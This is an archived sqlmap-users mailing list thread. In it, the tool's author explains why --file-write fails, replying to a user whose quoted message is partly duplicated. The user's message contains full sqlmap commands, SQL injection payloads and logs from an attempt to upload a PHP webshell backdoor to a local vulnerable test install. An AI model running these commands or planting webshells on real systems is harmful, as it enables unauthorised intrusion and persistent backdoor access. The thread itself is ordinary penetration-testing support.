Hi.
--file-write requires union or stacked techniques to be available. In case
of --os-shell we also use INTO OUTFILE technique which is pretty dirty (in
most of cases you can expect original results appearing in the first couple
of lines). Option --file-write in our case should produce a "clean" file
Kind regards,
Miroslav Stampar
On Fri, Mar 21, 2014 at 4:18 AM, Brian Olson <br...@hurrikane.net> wrote:
> Hello Everyone,
>
> I'm attempting to use sqlmap to exploit a local installation of some
> software. I know it's vulnerable because it's on exploit-db & metasploit
> pops it every time (http://www.exploit-db.com/exploits/20501/). I've had
> limited success with sqlmap, but I'm at the final stage now where I'm
> trying to use the sqli's I've found to upload a webshell via sqlmap. No
> dice....I'm getting an error stating "[ERROR] none of the SQL injection
> techniques detected can be used to write files to the underlying file
> system of the back-end MySQL server." Other than the obvious, I'm not sure
> what this means because --os-shell and --os-cmd upload a file and execute
> just fine. Does --file-write need something special? Here's the output:
>
> root@kali:/usr/share/sqlmap# sqlmap -u "
> http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin";
> -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
> /usr/share/webshells/php/simple-backdoor.php --file-dest
> progra~1/cyclope/ni4zlja=/backdoor.php -v3
>
> ...
> [*] starting at 23:13:08
>
> [23:13:08] [DEBUG] cleaning up configuration parameters
> [23:13:08] [DEBUG] setting the HTTP timeout
> [23:13:08] [DEBUG] setting the HTTP method to GET
> [23:13:08] [DEBUG] creating HTTP requests opener object
> [23:13:08] [DEBUG] forcing back-end DBMS to user defined value
> [23:13:08] [DEBUG] setting the write file functionality
> [23:13:08] [INFO] testing connection to the target URL
> [23:13:08] [DEBUG] declared web page charset 'utf-8'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: username
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND
> 'yVaP'='yVaP&password=admin
> Vector: AND [INFERENCE]
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND
> 'OHln'='OHln&password=admin
> Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
> ---
> [23:13:08] [INFO] testing MySQL
> [23:13:08] [INFO] confirming MySQL
> [23:13:08] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.1, Apache 2.2.14
> back-end DBMS: MySQL >= 5.0.0
> [23:13:08] [INFO] fingerprinting the back-end DBMS operating system
> [23:13:08] [INFO] the back-end DBMS operating system is Windows
> [23:13:08] [ERROR] none of the SQL injection techniques detected can be
> used to write files to the underlying file system of the back-end MySQL
> server
> [23:13:08] [INFO] fetched data logged to text files under
> '/usr/share/sqlmap/output/172.16.71.138'
>
> [*] shutting down at 23:13:08
>
>
> The results are the same when the cmdline is changed up for a POST version:
>
> root@kali:/usr/share/sqlm
> Hello Everyone,
>
> I'm attempting to use sqlmap to exploit a local installation of some
> software. I know it's vulnerable because it's on exploit-db & metasploit
> pops it every time (http://www.exploit-db.com/exploits/20501/). I've had
> limited success with sqlmap, but I'm at the final stage now where I'm
> trying to use the sqli's I've found to upload a webshell via sqlmap. No
> dice....I'm getting an error stating "[ERROR] none of the SQL injection
> techniques detected can be used to write files to the underlying file
> system of the back-end MySQL server." Other than the obvious, I'm not sure
> what this means because --os-shell and --os-cmd upload a file and execute
> just fine. Does --file-write need something special? Here's the output:
>
> root@kali:/usr/share/sqlmap# sqlmap -u "
> http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin";
> -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
> /usr/share/webshells/php/simple-backdoor.php --file-dest
> progra~1/cyclope/ni4zlja=/backdoor.php -v3
>
> ...
> [*] starting at 23:13:08
>
> [23:13:08] [DEBUG] cleaning up configuration parameters
> [23:13:08] [DEBUG] setting the HTTP timeout
> [23:13:08] [DEBUG] setting the HTTP method to GET
> [23:13:08] [DEBUG] creating HTTP requests opener object
> [23:13:08] [DEBUG] forcing back-end DBMS to user defined value
> [23:13:08] [DEBUG] setting the write file functionality
> [23:13:08] [INFO] testing connection to the target URL
> [23:13:08] [DEBUG] declared web page charset 'utf-8'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: username
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND
> 'yVaP'='yVaP&password=admin
> Vector: AND [INFERENCE]
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND
> 'OHln'='OHln&password=admin
> Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
> ---
> [23:13:08] [INFO] testing MySQL
> [23:13:08] [INFO] confirming MySQL
> [23:13:08] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.1, Apache 2.2.14
> back-end DBMS: MySQL >= 5.0.0
> [23:13:08] [INFO] fingerprinting the back-end DBMS operating system
> [23:13:08] [INFO] the back-end DBMS operating system is Windows
> [23:13:08] [ERROR] none of the SQL injection techniques detected can be
> used to write files to the underlying file system of the back-end MySQL
> server
> [23:13:08] [INFO] fetched data logged to text files under
> '/usr/share/sqlmap/output/172.16.71.138'
>
> [*] shutting down at 23:13:08
>
>
> The results are the same when the cmdline is changed up for a POST version:
>
> root@kali:/usr/share/sqlmap# sqlmap -u "
> http://172.16.71.138:7879/index.php";
> --data='act=auth-login&pag=login&username=admin&password=admin' -p
> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
> /usr/share/webshells/php/simple-backdoor.php --file-dest
> progra~1/cyclope/ni4zlja=/backdoor.php -v3
>
> Any thoughts on what may be happening here would be much appreciated.
>
> Thanks,
>
> Brian
> ap# sqlmap -u "http://172.16.71.138:7879/index.php";
> --data='act=auth-login&pag=login&username=admin&password=admin' -p
> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
> /usr/share/webshells/php/simple-backdoor.php --file-dest
> progra~1/cyclope/ni4zlja=/backdoor.php -v3
>
> Any thoughts on what may be happening here would be much appreciated.
>
> Thanks,
>
> Brian
>
>
> ------------------------------------------------------------------------------
> Learn Graph Databases - Download FREE O'Reilly Book
> "Graph Databases" is the definitive new guide to graph databases and their
> applications. Written by three acclaimed leaders in the field,
> this first edition is now available. Download your free book today!
> http://p.sf.net/sfu/13534_NeoTech
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Learn Graph Databases - Download FREE O'Reilly Book
"Graph Databases" is the definitive new guide to graph databases and their
applications. Written by three acclaimed leaders in the field,
this first edition is now available. Download your free book today!
http://p.sf.net/sfu/13534_NeoTech
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
